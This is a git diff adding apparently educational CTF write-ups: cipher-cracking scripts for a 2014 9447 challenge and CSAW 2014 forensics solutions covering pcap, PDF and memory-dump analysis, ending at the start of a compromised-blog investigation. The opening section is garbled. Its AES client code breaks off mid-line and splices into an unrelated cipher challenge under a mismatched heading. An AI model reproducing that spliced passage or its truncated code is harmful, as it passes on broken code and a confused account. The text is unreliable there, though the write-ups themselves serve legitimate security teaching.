diff --git a/CTFs_and_WarGames/2014/9447/README.md b/CTFs_and_WarGames/2014/9447/README.md new file mode 100644 index 0000000..c43cee5 --- /dev/null +++ b/CTFs_and_WarGames/2014/9447/README.md @@ -0,0 +1,213 @@ +# 9447's CTF 2014 + +## On Redis & AES Encryption + +### The Client File + +The first file was a script **client.py**, where, by using Python's [socket](https://docs.python.org/2/library/socket.html) library, showed how a connection to the server could be made: + +```py +import os, socket, struct, sys +from Crypto.Cipher import AES + +class EncryptedStream(object): + key = 'this is not the flag nor the key'[:16] + def __init__(self, host, port): + self.sock = socket.socket() + self.sock.connect((host, port)) + def send(self, msg): + while len(msg) % 16: + msg += '\0' + iv = os.urandom(16) + aes = AES.new(self.key, AES.MODE_ECB, iv) + enc = aes.encrypt(msg) + self.sock.send(struct.pack(' There's no heartbleed here. Why don't we use these ciphers? +> +> nc 54.209.5.48 12345 +> +> Written by psifertex + + +------ + +## Stage One: Caesar Cipher + + +#### Connecting to the Server + +We start typing the **netcat** command in the terminal: + +```sh +nc 54.209.5.48 12345 +``` + +We get the following message back: + +> Welcome to psifer school v0.002 +> +> Your exam begins now. You have 10 seconds, work fast. +> +> Here is your first psifer text, a famous ancient roman would be proud if you solve it. +> +> psifer text: **wkh dqvzhu wr wklv vwdjh lv vxshuvlpsoh** +> +>Time's up. Try again later. + +This text gives a cipher ``` wkh dqvzhu wr wklv vwdjh lv vxshuvlpsoh``` and the hint *a famous ancient roman would be proud*. That's all we need to decipher it! + + +#### Frequency Analysis +The famous roman is **Caesar**, and [his cryptographic scheme] is one of the simplest possible. This cipher is also known as **rotation cipher**, because all we do is rotating the letters by some value (the **key**). A modern version of it is called **ROT13**, meaning **rotation by 13 places**. This is a simple letter substitution cipher which replaces each letter with the 13th letter after it in the alphabet. In this case, we say that the *key is 13*. + +In our problem, we don't know the key. However, there is a method to circumvent it: we can count how many times each letter appears in the text and then we use some previous knowledge about the frequency of each letter in the English words. For example, in the English language, *e*, *t*, *a*, *o*, and *n* are frequent letters while *z* or *v* is not. This means that we can analyze the frequency of each character to determine what's the most probable rotation key. + +To count the frequency of characters in our cipher, we write a snippet that creates a counter [dictionary (hash table)] with all the (lowercase) characters as the dictionary's keys. Note that we could have used Python's [Counter() data-structure] as well. We then iterate through each character in the message, counting their frequency, and returning a sorted list of these values: + + +```python +import string + +def frequency(msg): + # Compute the word frequencies + dict_freq = dict([(c,0) for c in string.lowercase]) + diff = 0.0 + for c in msg.lower(): + if 'a'<= c <= 'z': + diff += 1 + dict_freq[c] += 1 + list_freq = dict_freq.items() + list_freq.sort() + return [b / diff for (a, b) in list_freq] +``` + + + + +#### Deciphering the Cipher + + + +Using a [well-known table of word frequency values], we write a snippet that does the following: + + 1. First, for each of the 26 letters, we subtract its known frequency value from the frequency obtained from our message. + 2. Second, we find what is the minimum value from those subtractions. The closest value is the most probable value for the rotation key. + + +```python +def delta(freq_word, freq_eng): + # zip together the value from the text and the value from FREQ + diff = 0.0 + for a, b in zip(freq_word, freq_eng): + diff += abs(a - b) + return diff + +def decipher(msg): + # Decipher by frequency + min_delta, best_rotation = 20, 0.0 + freq = frequency(msg) + for key in range(26): + d = delta(freq[key:] + freq[:key], FREQ_ENGLISH) + if d < min_delta: + min_delta = d + best_rotation = key + return cipher(msg, -best_rotation) +``` + + + + +Once we have the key, we just plug it back to the cipher algorithm, inverting the rotation to the other side, with ```cipher(msg, -best_rotation)```. In this cipher function, we iterate through all the character in the message, checking whether it's a letter or a special character. If it is the former case we perform the following operations: + + 1. We start getting the integer representing the [Unicode] code point of the character. + 2. To get its position in the alphabet and we subtract it from the Unicode value of *a*, given by **ord('a')** (this is 97). + 3. We add the key value to it to get the (absolute) shift position. + 4. Now we need to remember that this cipher is a ring, *i.e*, adding more stuff should always lead to a *spot* within the 26 letters in the alphabet. That's why we apply an [module] operation to this number to get the *relative* position in the letter's table. + 5. Finally, we just need the value of the shift to the Unicode of *a* to get the position of the character in the cipher. + 6. Remember we are using *-key*, so instead of making a new cipher, we are using the same steps to rotate the cipher to the other side to recover the message. + +```python +def cipher(msg, key): + # Make the cipher + dec = '' + for c in msg.lower(): + if 'a' <= c <= 'z': + dec += chr(ord('a') + (ord(c) - ord('a') + key) % 26) + else: + dec += c + return dec +``` + +Bingo! The snippets above lead us to our first answer in this problem: + +> the answer to this stage is **supersimple** + +Netcating several times can return other similar answers such as **hopeyouautomate** or **easypeesy** or **notveryhard**. They are all correct. + + + +#### Automating the Response + +To advance forward, we need to send one of the above answers to the socket. However, we only **have 10 seconds** to do this! It's clear that we need to automate this problem with a script. + +We can do this in many ways. In Python, for example, we can use the libraries [telnetlib] or [socket] or even writing our [own netcat script]. We will use the former for this exploit. Let us create a telnet connection with: + +```python +from telnetlib import Telnet + +PORT = 12345 +HOST = '54.209.5.48' + +tn = Telnet(HOST ,PORT) +``` + +In this case, socket reading can be done with ```tn.read_until(b'psifer text: ')```, which reads until a given string is encountered, or ```tn.read_all()```, which reads all data until EOF. + +To write a string to the socket we do ```tn.write(mystring.encode() + b'\n')```. Here, the method [encode()] returns an encoded version of the string, *i.e* a translation of a sequence of bytes to a Unicode string. + + +As a side note, if we had decided to use the [socket] library to create a *TCP socket*, the process would be easy as well: + +```python +s = socket(AF_INET, SOCK_STREAM) +s.connect(HOST) +``` + +Here ```socket.AF_UNIX, socket.AF_INET, socket.AF_INET6``` are constants that represent the address (and protocol) families. The constants ```socket.SOCK_STREAM, socket.SOCK_DGRAM, socket.SOCK_RAW, socket.SOCK_RDM, socket.SOCK_SEQPACKET```represent the socket types. + +To read the socket stream we would use commands such as ```s.recv(2048)``` and for writing, we could use ```s.sendall(answer)```. + + + +#### Decrypting and Sending the Answer +Now, back to our problem. After creating the telnet connection, we read whatever comes in: +```python +tn.read_until(b'psifer text: ') +``` + +We decode and decrypt the text, and then encode it again: +```python +msg_in1 = tn.read_until(b'\n').decode().strip() +dec_msg_in1 = decipher(msg_in1) +answer1 = dec_msg_in1.split()[-1].encode() + b'\n' +``` + +Finally, we send our answer to the telnet session (the same answer obtained before): +```python +tn.write(answer1) +``` + +----------------------------------------- + +## Stage Two: Offset with Special Characters + +The second stage starts with the following message: + + +> Congratulations, you have solved stage 1. You have 9 seconds left. +> +> Now it's time for something slightly more difficult. Hint, everybody knows it's +> not length that matters. + +Together with the hint *length doesn't matter*, we get the following cipher (translated as a Python string variable because of the special characters): + +```I'lcslraooh o rga tehhywvf.retFtelh mao ae af ostloh lusr bTsfnr, epawlltddaheoo aneviedr ose rtyyng etn aini ft oooey hgbifecmoswuut!oa eeg ar rr h.u t. hylcg io we ph ftooriysneirdriIa utyco gfl oostif sp u"+'""'+"flcnb roh tprn.o h``` + + +To crack this cipher we need to deal with special characters to find the rotation shift. We proceed with the following steps: + + 1. We start looping over the length of our message, where for each iteration we create a blank list with the size of the message. This is a bit *space-expensive* and it should be optimized if we needed to scale for larger problems. It's fine for our current problem. + + 2. We start a second loop, which will tell us about the shifts. This loop iterates again in the length of the message, this time adding the current character to the list we've created before and updated a pointer to the pacing value given in the first loop. Notice that we have a loop inside another, so this solution has *O(n^2) runtime* and it also should be optimized for larger problems. + + 3. Inside this second loop, we check whether the pacing pointer is larger than the length of the message, and if this is the case, we register it in a shift counter. The former pointer receives the value of this shift. This is the end of the second loop. + + 4. Back to the first loop, we add all the characters so far from our list into the message string. But when should we stop doing this? Until we make sure that had a rotation that produces real words. I tried a few common words, and 'you' worked just fine! + + +```python +def solve2(msg): + # Shift cypher, but dealing with special characters + for j in range(2, len(msg)): + + dec_msg = ['0'] * len(msg) + idec_msg, shift = 0, 0 + + for i in range(len(msg)): + dec_msg[idec_msg] = msg[i] + idec_msg += j + + if idec_msg > len(msg) - 1: + shift += 1 + idec_msg = shift + dec_msg = "".join(dec_msg) + + if "you" not in dec_msg: continue + return dec_msg +``` + +After decoding this stage's cipher we get the key for the next stage, which is then sent back through the socket: + +> I hope you don't have a problem with this challenge. It should be fairly straight forward if you have done lots of basic crypto. The magic phrase for your efforts is "**not not wrong**". For your efforts, you will get another challenge! + + + +---- + +## Stage Three: Vigenere Cipher + +The next message lets us know that we are close to the end: + +> Congratulations, you have solved stage 2. You have 9 seconds left. +> Last one. + +And comes with the following cipher: +``` +MVJJN BQXKF NCEPZ WWVSH YFCSV JEEBB UVRMX HKPIE PMMVZ FOPME ZQIIU EUZZW CGHMV BKBTZ BBHVR MVTQP ENXRM HIRNB WTGDZ CFEDS TKBBW HBFDI KILCM MUUPX WUNIN PWPFJ IEZTP MVQBX ACVKN AEMPV KQXAB ZMDUD ILISV NHKBJ FCIMW HTUVR MNNGU KIFED STLLX XAOUN YVEGV BEXEI BHJNI GHXFI FQFYV VXZFE FXFFH OBVXR MVNLT NHUYY FEZWD GBKEL SGFLM LXBFO NEIOS MZHML XAJUX EIKWH YNAIK SOFLF EEKPI XLSDB PNGHV XHFON MSFOL VMNVX HIRNB XBGTF FOEUZ FZMAS NZEGL HFTPM PDNWM DVKCG WHAFE OKWXF ZIBRQ XCSJI FIMVJ EAFEK MIRXT PBHUC YEEFP MZNMP XZBDV EMMHM VFTQU ABISA EWOMZ NMPXZ BDVPL HGFWF XISSX RMPLB HFRML RHKJU IGXPO OKNHQ TYFKB BWAOS UYKXA OOZNG IXRTK IUIBT ZFOOI LCMMY WEECU FZLMF DMVWK CIHPT BTPES OXYLC HIQII UEUZZ RFKIT RZYUO IMVFT IWITB ENCEP UFFVT XVBUI KNAVH IHYCM MYWUY YETLA PJNHJ MVFGF TMGHF ONBWL HBKCV EMSBT BHJMV FCYOI EGJDH HXTAB JIVLB GUKBX JNBOP NAMGU JJNAE MRFGY GHBBH FHPLB QIIUG HHALV SRSNU FKNAE MDPVG FMZVU SYXBT QUCSM LXFJX BMSYT TVNMS LIDTY LWY +``` + +This is a **[Vigenere Cipher]**, which is basically several Caesar ciphers in sequence, with different shift values, given by a key-word. Finding these shifts when we don't know the key can be done by writing the alphabet 26 times in different rows. In this case, each alphabet is shifted cyclically to the left compared to the previous alphabet (26 Caesar ciphers). + +Although we could use some [online Vigenere cracker] to extract the flag from this text, we will instead write a code. We use Python's library [pygenere], which has the methods ```crack_message()``` to decipher the message and ```crack_codeword()``` to find the key (useful because we don't have the key). We then send our cipher to the following function: + +```python +def solve3(msg): + key = VigCrack(msg).crack_codeword() + dec_msg = VigCrack(msg).crack_message() + dec_msg = dec_msg.replace(" ", "") + return key, dec_msg +``` + +This will give us the **key = TOBRUTE** and the deciphered text. After fixing the spaces between the words, we get: + +``` +THIS TIME WE WILL GIVE YOU MORE PLAINTEXT TO WORK WITH YOU WILL PROBABLY FIND THAT HAVING EXTRA CONTENT THAT IS ASCII MAKES THIS ONE MORE SOLVABLE IT WOULD BE SOLVABLE WITHOUT THAT BUT WE WILL MAKE SURE TO GIVE LOTS OF TEXT JUST TO MAKE SURE THAT WE CAN HANDLE IT I WONDER HOW MUCH WILL BE REQUIRED LETS PUT THE MAGIC PHRASE FOR THE NEXT LEVEL IN THE MIDDLE RIGHT HERE NORMALWORD OK NOW MORE TEXT TO MAKE SURE THAT IT IS SOLVABLE I SHOULD PROBABLY JUST PUT IN SOME NURSERY RHYME OR SOMETHING MARY HADA LITTLE LAMB LITTLE LAMB LITTLE LAMB MARY HADA LITTLE LAMB WHOSE FLEEZE WAS WHITE AS SNOW I DONT WANT TO MAKE THIS HARDER THAN IT NEEDS TO BE IF YOU VE SOLVED A LOT OF SIMPLE CRYPTO CHALLENGES YOU PROBABLY ALREADY HAVE THE CODE AND WILL BREEZE RIGHT THROUGH IT IF IT HELPS MOST OF THE PLAINTEXT IS STATIC AT EACH OF THE LEVELS I M NOT A MASOCHIST THE FUNNY THING IS THAT DEPENDING ON WHICH RANDOMKEY YOU GET THAT POEM MIGHT BE EXACTLY THE RIGHT OFFSET TO SUCCESSFULLY MOUNT AN ATTACK WE LL SEE LITTLE BIT MORE LITTLE BIT MORE THERE, +``` +Reading it carefully give us the last answer for the flag: **NORMALWORD**. Sweet! + + + + +## Final Words + +If you like this solution, take a look at my [exploit for this problem]. + +**Hack all the things!** + +[his cryptographic scheme]: http://en.wikipedia.org/wiki/Caesar_cipher +[exploit for this problem]: https://github.com/bt3gl/CTFs-Gray-Hacker-and-PenTesting/tree/master/CTFs_and_WarGames/2014-CSAW-CTF/cryptography/crypto-200 +[scripts from other authors]:https://github.com/bt3gl/CTFs-and-Hacking-Scripts-and-Tutorials/tree/master/2014-CSAW-CTF/cryptography/crypto-200/from_the_net +[well-known table of word frequency values]: http://en.wikipedia.org/wiki/Letter_frequency + [telnetlib]: https://docs.python.org/2/library/telnetlib.html + [socket]: https://docs.python.org/2/library/socket.html + [own netcat script]: https://github.com/bt3gl/CTFs-and-Hacking-Scripts-and-Tutorials/blob/master/Tutorials/Useful_Scripts/netcat.py + [pygenere]: http://smurfoncrack.com/pygenere/pygenere.php + [Vigenere Cipher]: http://en.wikipedia.org/wiki/Vigen%C3%A8re_cipher + [online Vigenere cracker]: http://smurfoncrack.com/pygenere/ +[dictionary (hash table)]: https://docs.python.org/2/tutorial/datastructures.html#dictionaries +[Counter() data-structure]: https://docs.python.org/2/library/collections.html#collections.Counter +[ord()]: https://docs.python.org/2/library/functions.html#ord +[module]: http://en.wikipedia.org/wiki/Modulo_operation +[Unicode]: http://en.wikipedia.org/wiki/Unicode +[encode()]: https://docs.python.org/2/library/stdtypes.html#str.encode diff --git a/CTFs_and_WarGames/2014/CSAW-quals/forensics/README.md b/CTFs_and_WarGames/2014/CSAW-quals/forensics/README.md index e69de29..d161b3f 100644 --- a/CTFs_and_WarGames/2014/CSAW-quals/forensics/README.md +++ b/CTFs_and_WarGames/2014/CSAW-quals/forensics/README.md @@ -0,0 +1,1012 @@ +# CSAW CTF 2014 - Forensics 200: "why not sftp?" + +The purpose of this problem is to teach about the need for encrypting your data. The [FTP] protocol sends clear text over the wire, *i.e* the data is transmitted without any encryption. + [SSH/Secure File Transfer Protocol] is a network protocol providing secure file transfer. Using SFTP, instead of FTP, would avoid finding the flag in this problem in the way we did. + +This is the second forensics problem and it starts with the following text: + +> well seriously, why not? +> +> Written by marc +> +> [traffic-5.pcap] +> + + + +--- + +## Analyzing the PCAP File + +Now let's search for the flag! We open the [pcap] file in [Wireshark] (an open-source packet analyzer). There are several things that we could search for in this file, for instance, we could look for FTP transactions or we could search for strings such as *password* or *flag*. We show both approaches. + + +## Solution 1: Searching for the string *flag* + +#### Going in the Wrong Way + +So the first thing I did was searching for the string *password*: + +1. Go to Edit +2. Go to Find Packet +3. Search for password choosing the options string and packet bytes. + +Clicking on *Follow TCP Stream* gives: +![cyber](http://i.imgur.com/c61P5Aj.png) + +Nope. This is misleading information! + +--- + +#### But We Were Almost There! + +Now, if we search for *flag* we actually find something: + +![cyber](http://i.imgur.com/knuwJFq.png) + +We find the packet with a file named flag! Awesome. + + +--- + +## Solution 2: Looking for the FTP Protocols + +All right, let's use another information we have: it should be something related to the FTP protocol. In Wireshark, we can find specific protocol with filters. We want to filter for FTP with some data. We start trying the usual FTP-DATA port: + +``` +tcp.port==21 +``` + +Nope. The results should be another port. Let's search explicitly for: + +``` +ftp-data +``` + +Cool, we found a few packets: +![cyber](http://i.imgur.com/cWhiXZD.png) + + We don't need to scroll down too much to find a packet with a string flag on it! Awesome. + + +--- + +## Extracting the File + +Once we find the packet with any of the methods above, we right-click it selecting *Follow TCP Stream*. This leads to: + +![cyber](http://i.imgur.com/LZTse2s.png) + +The file *flag.png* is our flag. To extract it we click in the *Save as* button, then in the terminal, we can use the command [file]: +```sh +$ file s.whatever +s.whatever: Zip archive data, at least v2.0 to extract +``` + +Awesome, so all we need is to *unzip* this file and we get *flag.png*: + +![cyber](http://i.imgur.com/WcxyITv.png) + +#### Extra: Finding files with *File Signatures* +If we don't know the name of the file we are looking for, but we know its type, we can search for its [file signature], which can be found [here] (a hex value). + + +**Hack all the Things!** +[file signature]: http://en.wikipedia.org/wiki/File_signature +[here]: http://en.wikipedia.org/wiki/List_of_file_signatures +[file]: http://en.wikipedia.org/wiki/File_(command) +[SSH/Secure File Transfer Protocol]: http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol +[traffic-5.pcap]: https://ctf.isis.poly.edu/static/uploads/7831788f2ab94feddc72ce53e80fda5f/traffic-5.pcap +[sftp]: http://en.wikipedia.org/wiki/SSH_File_Transfer_Protocol +[pcap]: http://en.wikipedia.org/wiki/Pcap +[Wireshark]: https://www.wireshark.org/ +[FTP]: http://en.wikipedia.org/wiki/File_Transfer_Protocol + +------------- + +# CSAW CTF 2014 - Forensics 200: "Obscurity" + + + +The third forensics challenge starts with the following text: + +> see or do not see +> +> Written by marc +> +> [pdf.pdf] +> + + +Hacking PDFs, what fun! + + +In general, when dealing with reverse-engineering malicious documents, we follow these steps: + + 1. We search for malicious embedded code (shell code, JavaScript). + + 2. We extract any suspicious code segments + + 3. If we see shellcode, we disassemble or debug it. If we see JavaScript (or ActionScript or VB macro code), we try to examine it. + + +However, this problem turned out to be very simple... + +--- + +## Finding the Flag in 10 Seconds + +Yeap, this easy: + + + 1. Download the PDF file. + + 2. Open it in any PDF viewer. + + 3. CTRL+A (select all the content). + + 4. You see the flag! + +![cyber](http://i.imgur.com/b03EehK.png) + +OK, we were lucky. Keep reading if you think this was too easy. + + + +---- + +## Analyzing the ID and the Streams in a PDF File + +Let's suppose we had no clue that the flag would just be a text in the file. In this case, we would want to examine the file's structure. For this task, we use the [PDF Tool] suite, which is written in Python. + +#### pdfid + +We start with *pdfid.py*, which parses the PDF looking for certain keywords. We download and unzip that script, and then we make it an executable: + +```sh +$ unzip pdfid_v0_1_2.zip +$ chmod a+x pdfid.py +``` + +Running over our file gives: +```sh +$ ./pdfid.py pdf.pdf +PDFiD 0.1.2 pdf.pdf + PDF Header: %PDF-1.3 + obj 20 + endobj 19 + stream 10 + endstream 10 + xref 1 + trailer 1 + startxref 1 + /Page 1 + /Encrypt 0 + /ObjStm 0 + /JS 0 + /JavaScript 0 + /AA 0 + /OpenAction 0 + /AcroForm 0 + /JBIG2Decode 0 + /RichMedia 0 + /Launch 0 + /EmbeddedFile 0 + /XFA 0 + /Colors > 2^24 0 +``` + +All right, no funny stuff going on here. We need to look deeper into each of these streams. + +#### pdf-parser + +We download *pdf-parser.py*, which is used to search for all the fundamental elements in a PDF file. Let's take a closer look: + +```sh +$ unzip pdf-parser_V0_4_3.zip +$ chmod a+x pdf-parser.py +$ ./pdf-parser.py +Usage: pdf-parser.py [options] pdf-file|zip-file|url +pdf-parser, use it to parse a PDF document + +Options: + --version show program's version number and exit + -s SEARCH, --search=SEARCH + string to search in indirect objects (except streams) + -f, --filter pass stream object through filters (FlateDecode, + ASCIIHexDecode, ASCII85Decode, LZWDecode and + RunLengthDecode only) + -o OBJECT, --object=OBJECT + id of indirect object to select (version independent) + -r REFERENCE, --reference=REFERENCE + id of indirect object being referenced (version + independent) + -e ELEMENTS, --elements=ELEMENTS + type of elements to select (cxtsi) + -w, --raw raw output for data and filters + -a, --stats display stats for pdf document + -t TYPE, --type=TYPE type of indirect object to select + -v, --verbose display malformed PDF elements + -x EXTRACT, --extract=EXTRACT + filename to extract malformed content to + -H, --hash display hash of objects + -n, --nocanonicalizedoutput + do not canonicalize the output + -d DUMP, --dump=DUMP filename to dump stream content to + -D, --debug display debug info + -c, --content display the content for objects without streams or + with streams without filters + --searchstream=SEARCHSTREAM + string to search in streams + --unfiltered search in unfiltered streams + --casesensitive case sensitive search in streams + --regex use regex to search in streams +``` + +Very interesting! We run it with our file, searching for the string */ProcSet*: +```sh +$ ./pdf-parser.py pdf.pdf | grep /ProcSet + /ProcSet [ /ImageC /Text /PDF /ImageI /ImageB ] +``` +Awesome! Even though we don't see any text in the file (when we opened it in the PDF viewer), there is text somewhere! + + +------------- + +## Getting Text from PDF + + +A good way to extract text from a pdf is using [pdftotext]: + +```sh +$ pdftotext pdf.pdf +``` + +You should get a ```pdf.txt``` file. Reading it with Linux's commands ```cat``` or ```strings```gives you the flag: + +```sh +$ strings pdf.txt +flag{security_through_obscurity} +``` + +As a note, there are several other PDF forensics tools that are worth to be mentioned: [Origami] (pdfextract extracts JavaScript from PDF files), [PDF Stream Dumper] (several PDF analysis tools), [Peepdf] (command-line shell for examining PDF), [PDF X-RAY Lite] (creates an HTML report with decoded file structure and contents), [SWF mastah] (extracts SWF objects), [Pyew](for examining and decoding structure and content of PDF files). + + + + + +**Hack all the things!** +[PDF Tool]:http://blog.didierstevens.com/programs/pdf-tools/ +[Origami]: http://esec-lab.sogeti.com/pages/Origami +[PDF Stream Dumper]: http://blog.zeltser.com/post/3235995383/pdf-stream-dumper-malicious-file-analysis +[Peepdf]: http://blog.zeltser.com/post/6780160077/peepdf-malicious-pdf-analysis +[SWF mastah]: http://blog.zeltser.com/post/12615013257/extracting-swf-from-pdf-using-swf-mastah +[PDF X-RAY Lite]: https://github.com/9b/pdfxray_lite +[Pyew]: http://code.google.com/p/pyew/wiki/PDFAnalysis + +[this website]: http://blog.didierstevens.com/programs/pdf-tools/ +[pdf-tools]: https://apps.fedoraproject.org/packages/pdf-tools +[pdf.pdf]: https://ctf.isis.poly.edu/static/uploads/883c7046854e04138c55680ffde90a61/pdf.pdf +[pdftotext]: http://en.wikipedia.org/wiki/Pdftotext + + + +---- + + +# CSAW CTF 2014 - Forensics 100: "dumpster diving" + + +This was the first forensic challenge. It starts with the following text: + +> dumpsters are cool, but cores are cooler +> +> Written by marc +> +> [firefox.mem.zip] + + + +##Unziping firefox.mem.zip + +The given file has a funny extension *.mem.zip*. Before we go ahead and unzip it, let's try to learn more about this file. To do this we choose to use the Linux's command [file]: + +```sh +$ file --help +Usage: file [OPTION...] [FILE...] +Determine the type of FILEs. + + --help display this help and exit + -v, --version output version information and exit + -m, --magic-file LIST use LIST as a colon-separated list of magic + number files + -z, --uncompress try to look inside compressed files + -b, --brief do not prepend filenames to output lines + -c, --checking-printout print the parsed form of the magic file, use in + conjunction with -m to debug a new magic file + before installing it + -e, --exclude TEST exclude TEST from the list of test to be + performed for file. Valid tests are: + apptype, ascii, cdf, compress, elf, encoding, + soft, tar, text, tokens + -f, --files-from FILE read the filenames to be examined from FILE + -F, --separator STRING use string as separator instead of `:' + -i, --mime output MIME type strings (--mime-type and + --mime-encoding) + --apple output the Apple CREATOR/TYPE + --mime-type output the MIME type + --mime-encoding output the MIME encoding + -k, --keep-going don't stop at the first match + -l, --list list magic strength + -L, --dereference follow symlinks (default) + -h, --no-dereference don't follow symlinks + -n, --no-buffer do not buffer output + -N, --no-pad do not pad output + -0, --print0 terminate filenames with ASCII NUL + -p, --preserve-date preserve access times on files + -r, --raw don't translate unprintable chars to \ooo + -s, --special-files treat special (block/char devices) files as + ordinary ones + -C, --compile compile file specified by -m + -d, --debug print debugging messages +``` + +We find the flag ```-z```, which allows us to look inside the zipped files: + +```sh +$ file -z firefox.mem.zip +firefox.mem.zip: ELF 64-bit LSB core file x86-64, version 1 (SYSV) (Zip archive data, at least v2.0 to extract) +``` +Cool! So let's go ahead and unzip this file: + +```sh +$ unzip firefox.mem.zip nzip firefox.mem.zip +Archive: firefox.mem.zip + inflating: firefox.mem + creating: __MACOSX/ + inflating: __MACOSX/._firefox.mem +``` + +-------- + + + +## Extra: Learning More about the *.mem* File + +This is a very weird file extension. If you google *.mem*, you don't find much, it's clear it's a memory file, but what now? From the *file* command, we learned that this is an *ELF 64-bit LSB core*. Let's understand this by parts. + +A [ELF] file (Executable and Linkable Format) is a standard file format for executables, object code, shared libraries, and core dumps. The cool thing about ELF is that it's not bound to any particular architecture. + +In Linux, we can use the command [readelf] to displays information about ELF files: + + +```sh +$ readelf firefox.mem +Usage: readelf elf-file(s) + Display information about the contents of ELF format files + Options are: + -a --all Equivalent to: -h -l -S -s -r -d -V -A -I + -h --file-header Display the ELF file header + -l --program-headers Display the program headers + --segments An alias for --program-headers + -S --section-headers Display the sections' header + --sections An alias for --section-headers + -g --section-groups Display the section groups + -t --section-details Display the section details + -e --headers Equivalent to: -h -l -S + -s --syms Display the symbol table + --symbols An alias for --syms + --dyn-syms Display the dynamic symbol table + -n --notes Display the core notes (if present) + -r --relocs Display the relocations (if present) + -u --unwind Display the unwind info (if present) + -d --dynamic Display the dynamic section (if present) + -V --version-info Display the version sections (if present) + -A --arch-specific Display architecture specific information (if any) + -c --archive-index Display the symbol/file index in an archive + -D --use-dynamic Use the dynamic section info when displaying symbols + -x --hex-dump= + Dump the contents of section as bytes + -p --string-dump= + Dump the contents of section as strings + -R --relocated-dump= + Dump the contents of section as relocated bytes + -w[lLiaprmfFsoRt] or + --debug-dump[=rawline,=decodedline,=info,=abbrev,=pubnames,=aranges,=macro,=frames, + =frames-interp,=str,=loc,=Ranges,=pubtypes, + =gdb_index,=trace_info,=trace_abbrev,=trace_aranges] + Display the contents of DWARF2 debug sections + --dwarf-depth=N Do not display DIEs at depth N or greater + --dwarf-start=N Display DIEs starting with N, at the same depth + or deeper + -I --histogram Display histogram of bucket list lengths + -W --wide Allow output width to exceed 80 characters + @ Read options from + -H --help Display this information + -v --version Display the version number of readelf + +``` + + +In addition, [LSB] stands for *Linux Standard Base*, which is a joint project by several Linux distributions. It specifies standard libraries, a number of commands and utilities that extend the POSIX standard, the layout of the file system hierarchy, run levels, the printing system, etc. + + + + +--- + +## Extracting Information from the *.mem* File + +It turned out that we don't even need to know anything about the file to find the flag. All we need to do is to search for the *flag* string: + +```sh +$ cat firefox.mem | grep -a 'flag{' +P��negativeone_or_fdZZZZZZZZZZZZnegativeone_or_nothingZZnegativeone_or_ssize_tZZd_name_extra_sizeZZZZZZZZZZZZnull_or_dirent_ptrZZZZZZZZZZOSFILE_SIZEOF_DIRZZZZZZZZZZZZ���� 3���������ZZZZZZZH�f�L��L��ZZ����@�m���������ZZZZZZZAG�@r���y��ZZZZZZZZflag{cd69b4957f06cd818d7bf3d61980e291} +``` + +Yay! We found the flag: **cd69b4957f06cd818d7bf3d61980e291**! + +**Hack all the things!** + + +[LSB]: http://en.wikipedia.org/wiki/Linux_Standard_Base +[readelf]: http://linux.die.net/man/1/readelf +[file]: http://en.wikipedia.org/wiki/File_(command) +[firefox.mem.zip]: https://ctf.isis.poly.edu/static/uploads/606580b079e73e14ab2751e35d22ad44/firefox.mem.zip +[ELF]: http://en.wikipedia.org/wiki/Executable_and_Linkable_Format + + +---------------------- + +# CSAW CTF 2014 - Forensics 300: "Fluffy No More" + + + +This is the fourth and the last of the forensics challenge in the CSAW CTF 2014 competition. It was much harder than the three before, but it was also much more interesting. + +The challenge starts with the following text: + + +> OH NO WE'VE BEEN HACKED!!!!!! -- said the Eye Heart Fluffy Bunnies Blog owner. +> Life was grand for the fluff fanatic until one day the site's users started to get attacked! Apparently fluffy bunnies are not just a love of fun furry families but also furtive foreign governments. The notorious "Forgotten Freaks" hacking group was known to be targeting high powered politicians. Were the cute bunnies the next in their long list of conquests!?? +> +>Well... The fluff needs your stuff. I've pulled the logs from the server for you along with a backup of its database and configuration. Figure out what is going on! +> +>Written by brad_anton +> +> [CSAW2014-FluffyNoMore-v0.1.tar.bz2] + +Oh, no! Nobody should mess with fluffy bunnies! Ever! Let's find how this attack happened! + + +## Inspecting the Directories + +We start by checking the identity of the file with the command [file]. We do this to make sure that the extension is not misleading: +```sh +$ file CSAW2014-FluffyNoMore-v0.1.tar.bz2 +CSAW2014-FluffyNoMore-v0.1.tar.bz2: bzip2 compressed data, block size = 900k + +``` + +OK, cool, we can go ahead and unzip the *bzip2* (compressed) tarball: + +```sh +$ tar --help | grep bz + -j, --bzip2 filter the archive through bzip2 +$ tar -xjf CSAW2014-FluffyNoMore-v0.1.tar.bz2 +``` +Now let's take a look inside the folder: +```sh +$ tree CSAW2014-FluffyNoMore-v0.1 +CSAW2014-FluffyNoMore-v0.1 +├── etc_directory.tar.bz2 +├── logs.tar.bz2 +├── mysql_backup.sql.bz2 +└── webroot.tar.bz2 + +0 directories, 4 files +``` + +All right, 4 more tarballs. Unziping and organizing them give us the following directories: + + - etc/ + - var/log and var/www + - mysql_backup.sql ([MySQL database dump file]) + + +This is the directory structure of a [LAMP server], where LAMP stands for Linux-Apache-MySQL-PHP in the [Linux File System]. In this framework, the PHP/HTML/JavaScript webpage is placed inside ```var/www```. + +The directory ```var/``` contains files that are expected to change in size and content as the system is running (var stands for variable). So it is natural that system log files are generally placed at ```/var/log```. + + + Finally, the ```etc/``` directory contains the system configuration files. For example, the file ```resolv.conf``` tells the system where to go on the network to obtain host name to IP address mappings (DNS). Another example is the file ```passwd```, which stores login information. + +--- + +## Before Anything else... + +OK, based on the previous challenges, we need to give a try: +```sh +$ grep -r -l "key{" +var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css +webroot.tar.bz2-extracted/var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css + +$ grep -r -l "flag{" +var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css +webroot.tar.bz2-extracted/var/www/html/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery-ui.min.css +``` + + Is our life this easy??? No, of course not. The hits we got are just funny names to mislead us, for example: +```html + -96px}.ui-icon-home{background-position:0 -112px}.ui-icon-flag{background-position:-16px +``` + +--- +## Analyzing the MySQL Dump File + +Let's start taking a look at ```mysql_backup.sql```. + +Of course, no luck for: + +```sh +$ cat mysql_backup.sql | grep 'flag{' +``` + +Fine. We open ```mysql_backup.sql``` in a text editor. The comments table shows that someone named "hacker" made an appearance: + + +```mysql +-- MySQL dump 10.13 Distrib 5.5.38, for debian-linux-gnu (i686) +-- +-- Host: localhost Database: wordpress +-- 